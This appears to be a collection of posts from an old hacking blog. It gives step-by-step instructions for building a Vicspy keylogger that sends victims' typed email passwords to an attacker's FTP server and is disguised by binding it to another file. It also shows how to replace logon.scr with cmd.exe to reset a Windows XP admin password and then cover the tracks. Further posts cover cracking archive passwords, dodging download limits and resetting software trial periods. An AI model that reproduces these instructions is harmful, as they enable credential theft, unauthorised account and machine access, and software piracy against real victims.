Wednesday, January 26, 2011
Manually Hide any file in JPEG
Hack Yahoo,Hotmail,Myspace,MSN account passwords
Hacking Facebook,hotmail,Yahoo,Gmail,Twitter,orkut,myspace and msn Passwords
3. Simply run peditor.exe to get key logger interface and create a key logger for hacking hotmail, yahoo and msn account password. No need to install software on computer.
Fill in ftp server as:
# user: your username at ftp server.
# pass: your password.
# logs: create a new folder named "logs" at your ftp server. You will receive hotmail, yahoo and msn hacked passwords in this folder.
# ftp.example.com : your ftp server address. (eg: ftp.drivehq.com for drivehq ftp server)
After you have completed filling ftp server, hit on "Check" just adjacent to it to check whether you have entered ftp server correctly and whether server is available.
5. In Control, check "Melt" to make key logger evaporate after installation on victim computer.
6. Additional Options included in Vicspy key logger are that you can
- Change keylogger file icon
- Bind key logger with another file to make it undetectable by victim.
7. Now, simply choose the path where you want key logger to be saved and hit on "Create" to create key logger file at preferred destination.
Once the victim installs key logger on his computer, you will start receiving all typed passwords on his computer in your FTP server account (in logs folder). Thus, our target of hacking hotmail, yahoo, msn account password accomplished.
Monday, October 18, 2010
How To Crack WinZip Or WinRar Password

In this post I’ll show you how to do it with Zip password Recovery Magic v6.1.1.169 .
1) Download Zip password Recovery Magic v6.1.1.169 from this link and install it
2) Launch Zip password Recovery Magic v6.1.1.169 and open winrar / winzip file that you want to crack

Brute force actually means to start with a letter a and encrypting it. Then see if the encrypted strings match. If not then b, c, … until we’ve gotten . Then the encrypted strings will match and we’ll know that is the right password.Brute force attack is the slowest method of cracking, but there is no risk that you’ll not find the password. The thing about brute force is that the time of cracking rises rapidly depending on how long the password is, how many characters are being used in it and so forth.
A dictionary attack is a method of breaking into a password-protected computer or server by systematically entering every word in a dictionary as a password.
Monday, October 4, 2010
Trick To Bypass Trial Version Limitations In Any Software
Have you ever downloaded any trial version software and it may have expired before you could have tested it for its full capabilties.In this trick I will explain to how you can use the trial version of any software over and again so that you can test the software properly before purchasing its full version.Basically there are two type of restrictions put by the software companies on trial version of softwares.
1.Disable some features of the software
2.Time Bound limitations like 5-days Trial version
This trick can extend only your time bound limitations hence provide you with the capability to use the trial version of the software for as long as you want.
Another big advantage of this trick is that it will increase your system security.For this trick we will be using a freeware software called sandboxie which very small(500 kb).It would protect your computer from malware andspywares to make changes to your system. Sandboxie runs the softwares in an isolated enviroment so that they cannot make permanent changes to your system.Here is the graphical representation of the programs running with sandboxie in memory.


- Goto http://www.sandboxie.com and download the software.
- Install and run it.
- Click on the Sandbox -> DefaultBox –> Run SandBoxed and then click on Run Any Program

- Now a new window will popup.Click on Browse

- Locate the setup of the trial software you want to install.Click on open
- Install the software and run it.You will see # in the software tittle bar.It indicates that the software is running under sandboxie.
- This will open up a new window and delete all the files created, Press the Delete Sandbox button to fully clear the contents.
Now reinstall the software as mentioned above and you will again get the full trial version.
Note:
- This trick will not work if you have already used the full trial version of the software without sandboxie.
- Sandboxie may crash if you run very large programs with it
Wednesday, September 8, 2010
How to hack windows XP admin password

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user
If the Administrator Account is called Frank and you want the password blah enter this
"net user Frank blah"
and this changes the password on franks machine to blah and your in.
Have fun
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks
Password Hacking
Most passwords can be cracked by using following techniques :
1) Hashing :- Here we will refer to the one way function (which may be either an encryption function or cryptographic hash) employed as a hash and its output as a hashed password.

If a system uses a reversible function to obscure stored passwords, exploiting that weakness can recover even 'well-chosen' passwords.
One example is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length.
LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately.
Hash functions like SHA-512, SHA-1, and MD5 are considered impossible to invert when used correctly.
2) Guessing :- Many passwords can be guessed either by humans or by sophisticated cracking programs armed with dictionaries (dictionary based) and the user's personal information.
Not surprisingly, many users choose weak passwords, usually one related to themselves in some way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs. Examples of insecure choices include:
* blank (none)
* the word "password", "passcode", "admin" and their derivatives
* the user's name or login name
* the name of their significant other or another person (loved one)
* their birthplace or date of birth
* a pet's name
* a dictionary word in any language
* automobile licence plate number
* a row of letters from a standard keyboard layout (eg, the qwerty keyboard -- qwerty itself, asdf, or qwertyuiop)
* a simple modification of one of the preceding, such as suffixing a digit or reversing the order of the letters.
and so on....
A password containing both uppercase & lowercase characters, numbers and special characters too; is a strong password and can never be guessed.
3) Default Passwords :- A moderately high number of local and online applications have inbuilt default passwords that have been configured by programmers during development stages of software. There are lots of applications running on the internet on which default passwords are enabled. So, it is quite easy for an attacker to enter default password and gain access to sensitive information. A list containing default passwords of some of the most popular applications is available on the internet.
Always disable or change the applications' (both online and offline) default username-password pairs.
4) Brute Force :- If all other techniques failed, then attackers uses brute force password cracking technique. Here an automatic tool is used which tries all possible combinations of available keys on the keyboard. As soon as correct password is reached it displays on the screen.This techniques takes extremely long time to complete, but password will surely cracked.
Long is the password, large is the time taken to brute force it.
5) Phishing :- This is the most effective and easily executable password cracking technique which is generally used to crack the passwords of e-mail accounts, and all those accounts where secret information or sensitive personal information is stored by user such as social networking websites, matrimonial websites, etc.

Phishing is a technique in which the attacker creates the fake login screen and send it to the victim, hoping that the victim gets fooled into entering the account username and password. As soon as victim click on "enter" or "login" login button this information reaches to the attacker using scripts or online form processors while the user(victim) is redirected to home page of e-mail service provider.
Never give reply to the messages which are demanding for your username-password, urging to be e-mail service provider.
It is possible to try to obtain the passwords through other different methods, such as social engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing, shoulder surfing, timing attack, acoustic cryptanalysis, using a Trojan Horse or virus, identity management system attacks (such as abuse of Self-service password reset) and compromising host security
However, cracking usually designates a guessing attack.
Wednesday, September 1, 2010
How to hack Rapid share and Mega upload
RAPID SHARE
Method 1
1.open your rapid share link
2.then click on free.
3.As soon as timer start type this in address bar and click enter
javascript:alert(c=0)
4.a pop up message will come click ok your counter is zero just download the stuff
Method 2
1.Delete the cookies in your browser internet explorer or Firefox or opera or whatever u use).
2.Press start->run,type cmd.
3.In the command prompt,type ipconfig/flushdns press enter.Then type ipconfig/release,then ipconfig/renew .Now type exit.
4.Now try downloading, for many people this may work if their ISP provides a dynamic ip
Method 3
1.Just switch off your router or modem) and switch it back on.
2.This may work for some users Mtnl and Bsnl) and maybe some others too.
Actually these methods generally work for those people whose ISP gives them dynamic ip.
If these don't work then one more thing that can be done is to use proxies.
Method 4
1.Download the software Hide ip platinum
2.Run it, then it will automatically chose a proxy (ip of a different country) for you. So you can easily download without any restrictions. You just have to change the proxy each time you download.
MEGA UPLOAD
Mega upload is very easy to hack to solve the download slots problem). Just go to http://leech.megaleecher.net/
Here you will find a place to put your original link. Put it there press enter and then you will get a direct link within some seconds. You are done!!!
-chintu
Thursday, May 13, 2010
Kaspersky Internet Security/Antivirus 2010 Never Ending Trail Hack
Step 1:Delete license Key

Step 2: Disable Self-Defense.

Step3:Now exit Kaspersky Internet security/Antivirus 2010,by right clicking the Icon of kaspersky Internet Security/Antivirus 2010 in the taskbar.
Step4: Open Run(Windows key+R),then type regedit and then press Enter.

Now registry editor will open.Now browse to HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\KasperskyL ab\protected\AVP9\environment(Windows7 x64) ;
HKEY_LOCAL_MACHINE\SOFTWARE\KasperskyLab\protected \AVP9\environment(Windows7 x86)
(Note:For other versions of Windows, this path might be different)

then select PCID & modify it.After that close registry editor.


Step5:Open kaspersky Internet security/Antivirus from the start menu. It will prompt to activate license.Click on Activate Trial Version. All done!!!













